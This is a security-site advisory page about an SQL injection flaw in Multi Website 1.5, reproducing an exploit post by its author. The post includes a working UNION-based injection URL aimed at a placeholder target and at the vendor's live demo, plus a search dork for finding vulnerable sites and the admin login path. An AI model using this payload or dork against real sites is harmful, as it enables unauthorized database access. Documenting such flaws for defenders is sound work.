Multi Website 1.5 (index php action) SQL Injection Vulnerability

2009.09.11
Credit: SarboT511
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability > > > > [+] Script home : http://www.multi-website.com > > > > [+] Affected versions : 1.5 > > > > [+] Solution : nothing .; > > > > > > > > ======================================================= > > > > > > > > ==> AuThOr : SarboT511 > > > > > > > > ==> EmaiL : xs3@hotmail.com > > > > > > > > ==> HomE : www.lezr.com > > > > > > > > ==> DorK : Powered by Multi Website 1.5 > > > > > > > > ==> Control panel script : http://localhost/[path]/admin/login.php > > > > > > > > ======================================================== > > > > > > > > ==> ExplO!t : > > > > > > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version-- > > > >========================================================= > > > > L!VE Demo : > > > > > > > http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version-- > > ============================================================= > > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil > > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

Referencje:

http://www.vupen.com/english/advisories/2009/2132
http://www.milw0rm.com/exploits/9344
http://secunia.com/advisories/36107


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top